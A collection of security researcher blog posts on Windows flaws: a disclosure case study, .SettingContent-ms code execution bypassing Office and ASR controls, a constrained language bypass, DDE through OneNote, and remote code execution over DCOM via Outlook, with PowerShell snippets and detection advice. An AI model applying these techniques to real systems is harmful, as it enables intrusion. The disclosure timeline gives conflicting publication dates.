CVE-2018–8414: A Case Study in Responsible Disclosure

The process of vulnerability disclosure can be riddled with frustrations, concerns about ethics, and communication failure. I have had tons of bugs go well. I have had tons of bugs go poorly.

I submit a lot of bugs, through both bounty programs (Bugcrowd/HackerOne) and direct reporting lines (Microsoft). I’m not here to discuss ethics. I’m not here to provide a solution to the great “vulnerability disclosure” debate. I am simply here to share one experience that really stood out to me, and I hope it causes some reflection on the reporting processes for all vendors going forward.

First, I’d like to give a little background on myself and my relationship with vulnerability research.

I’m not an experienced reverse engineer. I’m not a full-time developer. Do I know C/C++ well? No. I’m relatively new to the industry (3 years in). I give up my free time to do research and close my knowledge gaps. I don’t find crazy kernel memory leaks, rather, I find often overlooked user-mode logic bugs (DACL overwrite bugs, anyone?).

Most importantly, I do vulnerability research (VR) as a hobby in order to learn technical concepts I’m interested in that don’t necessarily apply directly to my day job. While limited, my experience in VR comes with the same pains that everyone else has.

When I report bugs, the process typically goes like this:

  1. Find bug->Disclose bug->Vendor’s eyes open widely at bug->Bug is fixed and CVE possibly issued (with relevant acknowledgement)->case closed
  2. Find bug->Disclose bug->Vendor fails to see the impact, issues a won’t fix->case closed

When looking at these two situations, there are various factors that can determine if your report lands on #1 or #2. Such factors can include:

  1. Internal vendor politics/reorg
  2. Case handler experience/work ethic/communication (!!!!)
  3. Report quality (did you explain the bug well, and outline the impact the bug has on a product?)

Factors that you can’t control can start to cause frustration when they occur repeatedly. This is where the vendor needs to be open to feedback regarding their processes, and where researchers need to be open to feedback regarding their reports.

So, let us look at a case study in a vulnerability report gone wrong (and then subsequently rectified):

On Feb 16, 2018 at 2:37 PM, I sent an email to secure@microsoft.com with a write-up and PoC for RCE in the .SettingContent-ms file format on Windows 10. Here is the original email:

This situation is a good example where researchers need to be open to feedback. Looking back on my original submission, I framed the bug mostly around Office 2016’s OLE block list and a bypass of the Attack Surface Reduction Rules in Windows Defender. I did, however, mention in the email that “The PoC zip contains the weaponized .settingcontent-ms file (which enables code-execution from the internet with no security warnings for the user)”. This is a very important line, but it was overshadowed by the rest of the email.

On Feb 16, 2018 at 4:34 PM, I received a canned response from Microsoft stating that a case number was assigned. My understanding is that this email is fairly automated when a case handler takes (or is assigned) your case:

Great. At this point, it is simply a waiting game while they triage the report. After a little bit of waiting, I received an email on March 2nd, 2018 at 12:27pm stating that they successfully reproduced the issue:

Awesome! This means that they were able to take my write-up with PoC and confirm its validity. At this very point, a lot of researchers see frustration. You take the time to find a bug, you take the time to report it, you get almost immediate responses from the vendor, and once they reproduce it, things go quiet. This is understandable since they are likely working on doing root cause analysis on the issue. This is the critical point in which it will be determined if the bug is worth fixing or not.

I will admit, I generally adhere to the 90 day policy that Google Project Zero uses. I do not work for GPZ, and I don’t get paid to find bugs (or manage multiple reports). I tend to be lenient if the communication is there. If a vendor doesn’t communicate with me, I drop a blog post the day after the 90 days window closes.

Vendors, PLEASE COMMUNICATE TO YOUR RESEARCHERS!

In this case, I did as many researchers would do once more than a month goes by without any word…I asked for an update:

At this point, it has almost been a month and a half since I have heard anything. After asking for an update, this email comes in:

Interesting…I all of the sudden have someone else handling my case? I can understand this as Microsoft is a huge organization with various people handling the massive load of reports they get each day. Maybe my case handler got swamped?

Let’s pause and evaluate things thus far: I reported a bug. This bug was assigned a case number. I was told they reproduced the issue, then I hear nothing for a month and a half. After reaching out, I find out the case was re-assigned. Why?

Vendors, this is what causes frustration. Researchers feel like they are being dragged along and kept in the dark. Communication is key if you don’t want 0days to end up on Twitter. In reality, a lot of us sacrifice personal time to find bugs in your products. If people feel like they don’t matter or are placed on the backburner, they are less likely to report bugs to you and more likely to sell them or drop them online.

Ok, so my case was re-assigned on April 25th, 2018 at 12:42 pm. I say “Thanks!!” a few days later and let the case sit while they work the bug.

Then, a little over a month goes by with no word. At this point, it has been over 90 days since I submitted the original report. In response, I sent another follow up on June 1st, 2018 at 1:29pm:

After a few days, I get a response on June 4th, 2018 at 10:29am:

Okay. So, let’s take this from the top. On Feb 16, 2018, I reported a bug. After the typical process of opening a case and verifying the issue, I randomly get re-assigned a case handler after not hearing back for a while. Then, after waiting some time, I still don’t hear anything. So, I follow up and get a “won’t fix” response a full 111 days after the initial report.

I’ll be the first to admit that I don’t mind blogging about something once a case is closed. After all, if the vendor doesn’t care to fix it, then the world should know about it, in my opinion.

Given that response, I went ahead and blogged about it on July 11, 2018. After I dropped the post, I was contacted pretty quickly by another researcher on Twitter letting me know that my blog post resulted in 0days in Chrome and Firefox due to Mark-of-the-Web (MOTW) implications on the .SettingContent-ms file format. Given this new information, I sent a fresh email to MSRC on June 14, 2018 at 9:44am:

At this point, I saw two exploits impacting Google Chrome and Mozilla FireFox that utilized the .SettingContent-ms file format. After resending details, I got an email on June 14, 2018 at 11:05am, in which MSRC informed me the case would be updated:

On June 26, 2018 at 12:17pm, I sent another email to MSRC letting them know that Mozilla issued CVE-2018-12368 due to the bug:

That same day, MSRC informed me that the additional details would be passed along to the team:

This is where things really took a turn. I received another email on July 3, 2018 at 9:52pm stating that my case had been reassigned once again, and that they are re-evaluating the case based on various other MSRC cases, the Firefox CVE, and the pending fixes to Google Chrome:

This is where sympathy can come into play. We are all just people doing jobs. While the process I went through sucked, I’m not bitter or angry about it. So, my response went like this:

After some time, I became aware that some crimeware groups were utilizing the technique in some really bad ways (https://www.proofpoint.com/us/threat-insight/post/ta505-abusing-settingcontent-ms-within-pdf-files-distribute-flawedammyy-rat). After seeing it being used in the wild, I let MSRC know:

MSRC quickly let me know that they are going to ship a fix as quickly as possible…which is a complete 180 compared to the original report assessment:

Additionally, there was mention of “another email on a different MSRC case thread”. That definitely piqued my interest. A few days later, I got a strange email with a different case number than the one originally assigned:

At this point, my jaw was on the floor. After sending some additional information to a closed MSRC case, the bug went from a “won’t fix” to “we are going to ship a fix as quickly as possible, and award you a bounty, too”. After some minor logistic exchanges with the Microsoft Bounty team, I saw that CVE-2018-8414 landed a spot on cve.mitre.org. This was incredibly interesting given less than a month ago, the issue was sitting as a “won’t fix”. So, I asked MSRC about it:

This is when I quickly found out that CVE-2018-8414 was being issued for the .SettingContent-ms RCE bug:

This is where the process gets cool. Previously, I disclosed a bug. That bug was given a “won’t fix” status. So, I blogged about it (https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39). I then found out it had been used to exploit 2 browsers, and it was being used in the wild. Instead of letting things sit, I was proactive with MSRC and let them know about all of this. Once the August patch Tuesday came around, I received this email:

Yay!!! So Microsoft took a “Won’t Fix” bug and reassessed it based on new information I had provided once the technique was public. After a few more days and some logistical emails with Microsoft, I received this:

I have to give it to Microsoft for making things right. This bug report went from “won’t fix” to a CVE, public acknowledgement and a $15,000 bounty pretty quickly.

As someone who likes to critique myself, I can’t help but acknowledge that the original report was mostly focused on Office 2016 OLE and Windows Defender ASR, neither of which are serviceable bugs (though, RCE was mentioned). How could I have done better, and what did I learn?

If you have a bug, demonstrate the most damage it can do. I can’t place all the fault on myself, though. While I may have communicated the *context* of the bug incorrectly, MSRC’s triage and product teams should have caught the implications in the original report, especially since I mentioned “which enables code-execution from the internet with no security warnings for the user”.

This brings me to my next point. We are all human beings. I made a mistake in not clearly communicating the impact/context of my bug. MSRC made a mistake in the assessment of the bug. It happens.

Here are some key points I learned during this process:

  1. Vendors are people. Try to do right by them, and hopefully they try to do right by you. MSRC gave me a CVE, an acknowledgement and a $15,000 bounty for a bug which ended up being actively exploited before being fixed
  2. Vendors: PLEASE COMMUNICATE TO YOUR RESEARCHERS. This is the largest issue I have with vulnerability disclosure. This doesn’t just apply to Microsoft, this applies to every vendor. If you leave a researcher in the dark, without any sort of proactive response (or an actual response), your bugs will end up in the last place you want them.
  3. If you think your bug was misdiagnosed, see it through by following up and stating your case. Can any additional information be provided that might be useful? If you get a bug that is issued a “won’t fix”, and then you see it being exploited left and right, let the vendor know. This information could change the game for both you and their customers.

Vulnerability disclosure is, and will continue to be, a hard problem. Why? Because there are vendors out there that will not do right by their researchers. I am sitting on 0days in products due to a hostile relationship with “VendorX” (not Microsoft, to be clear). I also send literally anything I think might remotely resemble a bug to other vendors, because they do right by me.

At the end of the day, treat people the way you would like to be treated. This applied to both the vendors and the researchers. We are all in this to make things better. Stop adding roadblocks.

Timeline:

Feb 16, 2018 at 2:37 PM EDT: Report submitted to secure@microsoft.com
Feb 16, 2018 at 4:34 PM EDT: MSRC acknowledged the report and opened a case
March 2, 2018 at 12:27 PM EDT: MSRC responded noting they could reproduce the issue
April 24, 2018 at 4:06 PM EDT: Requested an update on the case
April 25, 2018 at 12:42 PM EDT: Case was reassigned to another case handler.
June 1, 2018 at 1:29 PM EDT: Asked new case handler for a case update
June 4, 2018 at 10:29 AM EDT: Informed the issue was below the bar for servicing; case closed.
July 11, 2018: Issue is publicly disclosed via a blog post
June 14, 2018 at 9:44 AM EDT: Sent MSRC a follow up after hearing of 2 browser bugs using the bug
June 14, 2018 at 11:05 AM EDT: Case was updated with new information
June 26, 2018 at 12:17 PM EDT: informed MSRC of mozilla CVE (CVE-2018-12368)
June 26, 2018 at 1:15 PM EDT: MSRC passed the mozilla CVE to the product team
July 3, 2018 at 9:52 PM EDT: Case was reassigned to another case handler
Jul 23, 2018 at 4:49 PM EDT: Let MSRC know .settingcontent-ms was being abused in the wild.
Jul 27, 2018 at 7:47 PM EDT: MSRC informed me they are shipping a fix ASAP
Jul 27, 2018 at 7:55 PM EDT: MSRC informed me of bounty qualification
Aug 6, 2018 at 3:39 PM EDT: Asked MSRC if CVE-2018-8414 was related to the case
Aug 6, 2018 at 4:23 PM EDT: MSRC confirmed CVE-2018-8414 was assigned to the case
Aug 14, 2018: Patch pushed out to the public
Sept 28, 2018 at 4:36 PM EDT: $15,000 bounty awarded

Before publishing this blog post, I asked MSRC to review it and offer any comments they may have. They asked that I include on official response statement from them, which you can find below:

Cheers,
Matt N.

CVE-2018-8212: Device Guard/CLM bypass using MSFT_ScriptResource

Device Guard and the enlightened scripting environments that come with it are a lethal combination for disrupting attacker activity. Device Guard will prevent unapproved code from executing while placing scripting languages such as PowerShell and the Windows Scripting Host in a locked down state. In order to operate in such an environment, researching bypasses can be immensely useful. Additionally, there are evasion advantages that can come with executing unsigned code via signed/approved scripts or programs.

When hunting for Constrained Language Mode (CLM) bypasses in the context of Device Guard, investigating Microsoft-signed PowerShell modules for calls that allow arbitrary, unsigned code to be executed is always a fruitful endeavor as most Microsoft PowerShell modules will be signed (i.e. implicitly approved per policy). To combat abusing signed PowerShell modules to circumvent CLM, Microsoft added a check to make sure a module can only execute exported functions if the module is loaded in CLM (CVE-2017-8715). This means that, while a script may be signed and allowed per policy, that script can only execute functions that are explicitly exported via Export-ModuleMember. This addition significantly reduces the attack surface for signed PowerShell modules as non-exported functions will be subject to CLM, the same as unsigned code.

While this addition reduces the attack surface, it doesn’t remove it entirely. While analyzing Microsoft-signed PowerShell module files for functions that allowed unsigned code-execution, “MSFT_ScriptResource.psm1” from the Desired State Configuration (DSC) module cropped up. This module is signed by Microsoft, and has a function called “Get-TargetResource” that takes a “GetScript” parameter:

Looking at this function, the code passed via -GetScript is added to a new scriptblock via [ScriptBlock]::Create(). After doing so, it passes the psboundparameters to the function “ScriptExecutionHelper”.

If we take a look at “ScriptExecutionHelper”, all it does is take the psboundparameters (which includes our newly created ScriptBlock) and execute it via the call operator (&):

Since all of this is happening within a Microsoft signed module, the module is permitted to run in FullLanguage mode (i.e. without any restrictions imposed upon it). To abuse this, all we need to do is pass our malicious PowerShell code to Get-TargetResource via the -GetScript parameter. But, isn’t the Export-ModuleMember mitigation from CVE-2017-8715 supposed to prevent function abuse? Looking at the exported functions in “MSFT_ScriptResource.psm1”, the abusable function “Get-TargetResource” is actually exported for us:

Excellent! To test this out, we can add some arbitrary C# code (that simply takes the Square Root of 4) to a PowerShell variable called $code:

After doing so, we just need to import the “MSFT_ScriptResource” PowerShell module and call “Get-TargetResource” with “Add-Type -TypeDefinition $code” as the -GetScript parameter. When this executes, the Microsoft signed PowerShell module will be loaded in FullLanguage mode (since it is signed and permitted via the Device Guard policy), and the code passed to the Get-TargetResource function will thus be executed in FullLanguage mode as well:

As you can see above, we are running in ConstrainedLanguage mode and getting the square root of 4 fails as those method calls are blocked. We then add our “malicious” code to the $code variable. All this code does is take the SquareRoot of 4, like we previously tried to do. Once that is done, the “MSFT_ScriptResource” module is imported and our “malicious” code is passed to “Get-TargetResource” via the -GetScript parameter. When that executes, the Add-Type call is executed and our “malicious” code is executed, thus circumventing CLM on Device Guard. It should be noted that enabling ScriptBlock logging will still capture the CLM bypass attempt.

This bug was fixed via CVE-2018-8212. If you are interested, Microsoft recently added bypasses like this to the WDAC Application Security bounty program: https://www.microsoft.com/en-us/msrc/windows-security-servicing-criteria

 

Cheers,

Matt N.

The Tale of SettingContent-ms Files

As an attacker, initial access can prove to be quite the challenge against a hardened target. When selecting a payload for initial access, an attacker has to select a file format that allows arbitrary code execution or shell command execution with minimal user interaction. These file formats can be sparse, which is why attackers have relied on file types like .HTAs, Office macros, .VBS, .JS, etc. There are obviously a finite number of built-in file extensions on Windows, and as defenses improve, the number of effective payloads continues to shrink.

Additionally, an attacker has to get that file to the end user in a way that will result in execution. Again, options for this can be limited as directly linking to payloads or attaching them to emails tend to get blocked by antivirus or browser protections. This is why attackers have resorted to Object Linking and Embedding (OLE), ZIP files, etc. To combat the file delivery vector, Office 2016 introduced blocking all of the “dangerous” file formats from being embedded via OLE by default. This reduces the effectiveness of one of the most relied upon payload delivery methods. When trying to activate a blocked file extension, Office will throw an error and prevent execution:

In addition to OLE blocking, Microsoft also introduced Attack Surface Reduction (ASR) rules  into Windows 10 (which requires Windows Defender AV as a dependency). The purpose of these rules are to reduce the functionality that an attacker can abuse or exploit to obtain code-execution on the system. One of the most touted and effective ASR rules is “Block Office applications from creating child processes”. This rule will block any attempt to spawn a process as a child of an Office application:

When you combine OLE blocking and ASR together, the options to execute code on an endpoint from the internet become a little more limited. Most useful file types can’t be delivered via OLE per the new block in Office 2016, and ASR’s child process creation rule prevents any instances of a child process spawning under an Office application.

How could we circumvent these controls? I first decided to tackle the file format problem. I spent a lot of hours going through the registry looking for new file formats that might allow execution. Most of these formats can be found in the root of the HKCR:\ registry hive. The process involved pulling all of the registered file formats out and then looking at them to see if the format itself allowed for anything interesting.

After countless hours reading file specifications, I stumbled across the “.SettingContent-ms” file type. This format was introduced in Windows 10 and allows a user to create “shortcuts” to various Windows 10 setting pages. These files are simply XML and contain paths to various Windows 10 settings binaries. An example .SettingContent-ms file will look like this:

All this file does is open the Control Panel for the user. The interesting aspect of this file is the <DeepLink> element in the schema. This element takes any binary with parameters and executes it. What happens if we simply substitute “control.exe” to something like “cmd.exe /c calc.exe”?

Then if we double-click the file:

What is interesting is that when double-clicking the file, there is no “open” prompt. Windows goes straight to executing the command.

Great! So we have a file format that allows shell command execution via a file open. This solves the “what file format to use” problem of initial access. Now, how can we deliver it? My next thought was to see what happens if this file comes straight from the internet via a link.

Yikes!! When this file comes straight from the internet, it executes as soon as the user clicks “open”. Looking at the streams of the file, you will notice that it does indeed grab Mark-Of-The-Web:

When looking up the ZoneIds online, “3” equals “URLZONE_INTERNET”. For one reason or another, the file still executes without any notification or warning to the user.

So, we now have a file type that allows arbitrary shell command execution and displays zero warnings or dialogues to the user. When trying to get initial access, going across a target’s perimeter with an unusual file type can be risky. Ideally, this file would be placed in a container of a more common file type, such as an Office document.

As mentioned before, Office 2016 blocks a preset list of “known bad” file types when embedded with Object Linking and Embedding. The SettingContent-ms file format, however, is not included in that list:

At this point, we can evade the Office 2016 OLE file extension block by embedding a malicious .SettingContent-ms file via OLE:

When a document comes from the internet with a .SettingContent-ms file embedded in it, the only thing the user sees is the “Open Package Contents” prompt. Clicking “Open” will result in execution. If an environment doesn’t have any Attack Surface Reduction rules enabled, this is all an attacker needs to execute code on the endpoint. I was curious, so I poked at how this holds up with ASR’s child process creation rules enabled. It is also worth noting that at of the time of this post, ASR rules do not appear to work on Office if Office was installed from the Windows Store.

Enabling these rules is pretty simple, and can be done with one PowerShell command: “Set-MpPreference -AttackSurfaceReductionRules_Ids <rule ID> -AttackSurfaceReductionRules_Actions Enabled”

The <rule ID> parameter is the GUID of the rule you want to enabled. You can find the GUID for each ASR rule documented here. For this test, I want to enable the Child Process Creation rule, which is GUID D4F940AB-401B-4EFC-AADC-AD5F3C50688A.

After enabling the rule, the attack no longer works:

Since the rule is designed to block child processes from being spawned from an Office application, our payload executed, but the rule blocked the command. This got me thinking into how ASR achieves that without breaking some functionality. I first started to just test random binaries in random paths to see if ASR was blocking based on the image path. This was quite time consuming and didn’t get me very far.

I ended up taking a step back and thinking about what parts of Office have to work. After running ProcMon and looking at Process Explorer for a little bit while clicking around in Word, I noticed that there were still child processes being spawned by Word.

This makes sense, as Office needs to use features that rely on other programs. I thought that maybe the ASR rule blocks child processes based on image path, but images in the Office path are allowed to be spawned when features are activated.

To test this theory, I changed my .SettingContent-ms file to the path of “Excel.exe”:

The next step is to embed this new file into a Word document and see if ASR blocks “Excel.exe” from being spawned.

Interestingly enough, ASR allows Excel to start. So the child process creation ASR rule appears to be making decisions based on whitelisted paths.

This sent me down a long, long path of trying to find a binary I could use that existed in the path “C:\Program Files\Microsoft Office”. After going through a few of them and passing “C:\Windows\System32\cmd.exe” to them as a parameter on the command line, one of them kicked:

Perfect! We are able to abuse “AppVLP” to execute shell commands. Normally, this binary is used for Application Virtualization, but we can use it as an abuse binary to circumvent the ASR file path rule. To test this full chain, I updated my .SettingContent-ms file to look like this:

Now, the file just needs embedded into an Office document and executed:

As you can see, with Office 2016’s OLE block rule and ASR’s Child Process Creation rule enabled, .SettingContent-ms files combined with “AppVLP.exe” in the Office folder allow us to circumvent these controls and execute arbitrary commands.

While Office documents are often marked with MOTW and are opened in the Protected View Sandbox, there are file formats that allow OLE and aren’t triggered by the Protected View sandbox. You can find more on that here.

Wrap Up:

After looking into ASR and the new file formats in Windows 10, I realized that it is important to try and audit new binaries and file types that get added in each release of Windows. In this case, the .SettingContent-ms extension can allow an attacker to run arbitrary commands on the latest version of Windows while evading ASR and Office 2016 OLE blocks. Additionally, the file type appears to give execution (even from the internet) immediately after it’s opened, despite having the MOTW applied.

Defenses:

Great, so what can you do about it? Ultimately, a .SettingContent-ms file should not be executing anywhere outside of the “C:\Windows\ImmersiveControlPanel” path. Additionally, since the file format only allows for executing shell commands, anything being run through that file is subject to command line logging.

It is also a good idea to always monitor child process creations from Office applications. There are a few applications that should be spawning under the Office applications, so monitoring for outliers can be useful. One tool that can accomplish this is Sysmon.

Another option is to neuter the file format by killing its handler. I have NOT tested this extensively and can offer no guarantee that something within Windows won’t break by doing this. For those who want to play around with the implications of killing the handler to the .SettingContent-ms file format, you can set  the “DelegateExecute” key in “HKLM:\SettingContent\Shell\Open\Command” to be empty. Again, this might break functionality on the OS, so proceed with caution.

You can find a PoC SettingContent-ms file here: https://gist.github.com/enigma0x3/b948b81717fd6b72e0a4baca033e07f8

Reporting timeline:

2/16/2018: Report sent MSRC

2/16/2018: MSRC acknowledged the report, case number assigned

3/2/2018: MSRC confirmed that they could reproduce the issue

4/24/2018: Requested status update

4/25/2018: MSRC informed me of a case handler change. An update was requested from the engineering team and would be relayed to me ASAP

6/1/2018: Requested another update from MSRC

6/4/2018: MSRC responded with a note that the severity of the issue is below the bar for servicing and that the case will be closed.

06/11/2018: Report published

 

Cheers!
Matt N.

Reviving DDE: Using OneNote and Excel for Code Execution

TL;DR: You can achieve DDE execution with Excel SpreadSheets embedded within OneNote. This bypasses the original Excel mitigation ruleset (Microsoft has released a patch to properly mitigate this) as well as the Protected View sandbox 🙂

Dynamic Data Exchange (DDE) has been a hot topic as of late. For those unfamiliar with DDE, it is designed to transfer data between two applications. In 2014, Contextis put out a nice blog post on using DDE in Microsoft Excel for code execution by utilizing the “=DDE()” formula.

Then, on October 9th 2017, SensePost released a really great blog post on abusing the DDEAUTO field code in Microsoft Word to get code execution. Shortly after, various malware families adopted the technique and it was quickly seen in the wild.

After seeing a spike in malicious use, Will Dormann (@wdormann) of US-CERT published some registry changes that would widely mitigate most DDE threats. These changes disabled DDE and prevented links from automatically updating automatically for Word and Excel. Will added a OneNote block after sharing the details outlined below with him privately. Unfortunately the only fix was to completely kill embedded files, which is less than ideal. You can find these registry changes here: https://gist.github.com/wdormann/732bb88d9b5dd5a66c9f1e1498f31a1b

This guidance was really helpful to those dealing with actors using DDE techniques more and more. Then, on November 8th 2017, Microsoft published an official post that outlines mitigating the DDE threat for those who don’t use the protocol in their environment, which was released under Advisory ADV170021 with additional documentation here. These mitigations were largely just for Word and it involved preventing any execution entirely as opposed to stopping automatic link updating. In addition to this post, Microsoft also stated that Protected View will prevent automatic DDE execution and that users should open untrusted documents with caution.

After seeing these new DDE mitigation recommendations, I became curious how these were handled when executed from within a different Office application, such as Publisher or OneNote. At the time, Will Dormann’s gist was the only source for mitigation options in other Office apps (such as Excel) as Microsoft only released official guidance for Word.

So, why OneNote? Well, it allows a user to embed Excel spreadsheets into a note document and then save it. This provides the end user the ability to reference or use Excel features directly within OneNote. As you may know, you can abuse DDE in Excel to get code execution! Ideally, Will’s Excel registry changes to stop DDE attacks would apply to any Excel sheets embedded in OneNote. Unfortunately, this wasn’t the case.

When implementing Will’s Excel registry change (specifically “DDEAllowed” set to DWORD 0), you will see something like this when opening a spreadsheet that contains a DDE formula:

So, the Excel DDE block is working as expected. Now, let’s look at OneNote. In order to utilize the Excel functionality in OneNote, you can go to “SpreadSheet” under the “Files” tab and either import an existing Excel Spreadsheet or create a new one.

So, OneNote allows us to import an existing spreadsheet. What happens if we import a DDE-laced spreadsheet? First, we need to create it. Ryan Hanson (@ryhanson) put out a tweet showing that you can manipulate the warning box during DDE execution and change the binary name. This can be helpful as you can change it to something like “MSEXCEL.exe” instead of displaying “cmd.exe” or “powershell.exe”.

           Source: https://twitter.com/ryHanson/status/918598525792935936

 

After adding that formula to an Excel spreadsheet and saving it, we can now test it to ensure it displays properly. To do so, I have removed the Excel DDE mitigation registry changes.

Great, so it works. Next, let’s test it with Will’s Excel registry changes applied:

Awesome, so these changes do indeed block the Excel DDE POC that we have just created. Now that we have our DDE spreadsheet ready and tested, we can import it into OneNote by going to “Insert->SpreadSheet->Existing Excel SpreadSheet”

OneNote will ask you to browse to the file you want to import, which will be the previously created DDE laced spreadsheet. Next, it will ask you if you want to attach the file or insert the spreadsheet. We will do “Insert SpreadSheet”

OneNote will then import the spreadsheet and during that process, it will attempt to execute your DDE command. To prevent that, simply click “No”

Finally, save the OneNote file. At this point, that OneNote file has a DDE laced Excel SpreadSheet directly embedded in it. Now, let’s see what happens when the Excel SpreadSheet is accessed from within the OneNote file with the Excel DDE mitigation registry changes in place:

Clicking “Yes” results in the command being executed:

So, despite blocking DDE in Excel via “DDEAllowed”, the functionality is still there when accessed through OneNote. After chatting with Will Dormann, the only working mitigation is to set “DisableEmbeddedFiles” to 1. This obviously kills all file embedding functionality as a side-effect, which isn’t great for usability.

As mentioned above, one of Microsoft’s statements notes that Protected View will prevent the DDE vectors when originating from an untrusted source (such as the internet). This is the case for most Office applications as any content originating from an untrusted source is opened in a sandbox first. OneNote, however, is not enrolled in Protected View and will not trigger it when pulled from the internet. If a user has OneNote installed, an attacker can embed a weaponized Excel spreadsheet into a OneNote file and send it to a victim via a weblink or an email attachment. When the user receives the OneNote file and opens the embedded spreadsheet, it will not open in Protected View and they will simply be presented with the DDE prompt (which you can tamper with as demonstrated above):

*It should be noted that the Protected View aspect was reported to MSRC on April 20th, 2017 and it was deemed not a security issue.

So, what can you do? Well, at the time, the only mitigation was to completely kill embedding in OneNote. This was reported to Microsoft on October 10th of 2017 and on January 9th, 2018 they pushed out an update to all Office versions going back to 2007. The Excel update was added to the already existing Advisory ADV170021, in which that advisory now details how to implement mitigations for both Excel and Word (since it was previously only Word that was available). Additional documentation can be found here. This update created a value you can add under Microsoft Excel’s security options in the registry. By setting “DisableDDEServerLaunch” to DWORD 1, DDE will effectively be neutered for Excel. This is important because OneNote itself wasn’t entirely interesting. It was the embedded Excel functionality that made this attack work. By adding mitigation options for Excel, users can protect themselves from this attack.

Additionally, you can employ Attack Surface Reduction (ASR) rules in Windows 10 1709 to prevent not only DDE attacks, but other attacks where an Office program is spawning a child process. You can read more on ASR here.

-Matt N.

Lateral Movement Using Outlook’s CreateObject Method and DotNetToJScript

In the past, I have blogged about various methods of lateral movement via the Distributed Component Object Model (DCOM) in Windows. This typically involves identifying a DCOM application that has an exposed method allowing for arbitrary code execution. In this example, I’m going to cover Outlook’s CreateObject() method.

If you aren’t familiar with CreateObject(), it essentially allows you to instantiate an arbitrary COM object. The issue with abusing DCOM applications for lateral movement is that you are normally at the mercy of the method being used. The majority of the talked about techniques involve abusing a ShellExecute (or similar) method to start an arbitrary process or opening a malicious file on the target host, which requires placing a payload on disk (or a network share). While these techniques work great, they aren’t ideal from a safety perspective.

For example, the ShellBrowser/ShellBrowserWindow applications only allow you to start a process with parameters, which makes the technique susceptible to command line logging. What about the Run() methods for macro execution? Well, that requires the document with the malicious macro to be local or hosted on a share (not exactly ideal).

What if we could get direct shellcode execution via DCOM and not have to worry about files on the target or arbitrary processes such as powershell or regsvr32? Luckily, Outlook is exposed via DCOM and has us covered.

First, we need to instantiate Outlook remotely:
$com = [Type]::GetTypeFromProgID('Outlook.Application’,’192.168.99.152’)
$object = [System.Activator]::CreateInstance($com)

After doing so, you will have the CreateObject() method available to you:

 

As discussed above, this method provides the ability to instantiate any COM object on the remote host. How might this be abused for shellcode execution? Using the CreateObject method, we can instantiate the ScriptControl COM object, which allows you to execute arbitrary VBScript or JScript via the AddCode() method:

$RemoteScriptControl = $object.CreateObject(“ScriptControl”)

If we use James Forshaw’s DotNetToJScript technique to deserialize a .NET assembly in VBScript/JScript, we can achieve shellcode execution via the ScriptControl object by passing the VBScript/JScript code to the AddCode() method. Since the ScriptControl object was instantiated remotely via Outlook’s CreateObject() method, any code passed will be executed on the remote host. To demonstrate this, I will use a simple assembly that starts calc. The PoC C# looks something like this:

Note: Since it is just C#, this can be a full shellcode runner as well 🙂

After compiling the “payload”, you can pass it to DotNetToJScript and get back some beautiful JScript/VBScript. In this instance, it will be JScript.

Now that the payload has been generated, it can be passed to the ScriptControl COM object that was created via Outlook’s CreateObject method on the remote host. This can be accomplished by storing the entire JScript/VBScript code block into a variable in PowerShell. In this case, I have stored it in a variable called “$code”:

Finally, all that needs done is to set the “Language” property on the ScriptControl object to whatever language that will be executed (JScript or VBScript) and then call the “AddCode()” method with the “$code” variable as a parameter:

$RemoteScriptControl.Language = “JScript”
$RemoteScriptControl.AddCode($code)

After the “AddCode()” method is invoked, the supplied JScript will execute on the remote host:

As you can see above, calc.exe has spawned on the remote host.

Detections and Mitigations:

You might have noticed in the above screenshot that Outlook.exe spawned as a child of svchost.exe. That is indicative of Outlook.Application being instantiated via DCOM remotely, so that should stick out. In most cases, the process being started will contain “-embedding” in the command line, which is also indicative of remote instantiation.

Additionally, module loads of vbscript.dll or jscript/jscript9.dll should stand out as well. Normally, Outlook does not load these and those being loaded would be indicators of the ScriptControl object being used.

In this example, the payload was running as a child process of Outlook.exe, which would be weird. It is important to remember that ultimately, a .NET assembly is being executed, meaning that shellcode injection is absolutely doable. Instead of simply starting a process, an attacker can write an assembly that injects shellcode into another process, which would bypass the parent-child relationship detection. Ultimately, enabling the Windows Firewall will prevent this attack as it stops DCOM usage.

-Matt N

A Look at CVE-2017-8715: Bypassing CVE-2017-0218 using PowerShell Module Manifests

Recently, Matt Graeber (@mattifestation) and I have been digging into methods to bypass User Mode Code Integrity (UMCI) in the context of Device Guard. As a result, many CVEs have been released and Microsoft has done a good job at mitigating the attack surface that PowerShell imposes on UMCI by way of continuing to improve Constrained Language Mode (CLM) – the primary PowerShell policy enforcement mechanism for Device Guard and AppLocker. The following mitigations significantly reduce the attack surface, and were a result of CVE-2017-0218.

The vast majority of these injection bugs abuse Microsoft-signed PowerShell scripts or modules that contain functionality to run unsigned code. This ranges all the way from calling Invoke-Expression on a parameter to custom implementations of PowerShell’s Add-Type cmdlet. Microsoft-signed PowerShell code is targeted because an AppLocker or Device Guard policy that permits Microsoft code to execute will execute in Full Language Mode – i.e. with no restrictions placed on what code can be executed.

To fully understand the fix, let’s examine the behavior before the patch. The gist of this bug is that an attacker can use functions within a Microsoft-signed PowerShell script to bypass UMCI. To demonstrate this, let’s look at the script “utils_SetupEnv.ps1”, a component of Windows Troubleshooting Packs contained within C:\Windows\diagnostics. This particular script has a function called “import-cs”. This function simply takes C# code and calls Add-Type on it (note: Add-Type is blocked in constrained language mode). Since the script is Microsoft-signed, it executes in Full Language mode, allowing an attacker to execute arbitrary C#.

As you can see above, we imported “utils_SetupEnv.ps1”, which exposed the “import-cs” function to us. Using that function, we can pass it our own C# which gets executed, bypassing constrained language mode. The above bug was issued CVE-2017-0218 and fixed.

In response to bugs like the one above, Microsoft imposed a few additional restrictions when running in PowerShell’s Constrained Language Mode. The first one is that you are no longer allowed to import PowerShell scripts (.PS1s) via Import-Module or other means. If you try to import a script in CLM, you will see something like this:

One possible workaround would be to rename a PowerShell script (.PS1) to a module file (.PSM1) and import it that way, right? Well, that is where the second mitigation comes in.

Microsoft introduced a restriction on what you can import and use via PowerShell modules (.PSM1s). This was done with “Export-ModuleMember”; if you aren’t familiar with Export-ModuleMember, it defines what functions in a module are able to be used once its imported. In Constrained Language Mode, a module’s function has to be exported via Export-ModuleMember in order for it to be available. This significantly reduces the attack surface of functions to abuse in Microsoft signed PowerShell modules. It’s also just good practice in general to explicitly define what functions you want to expose to users of your module.

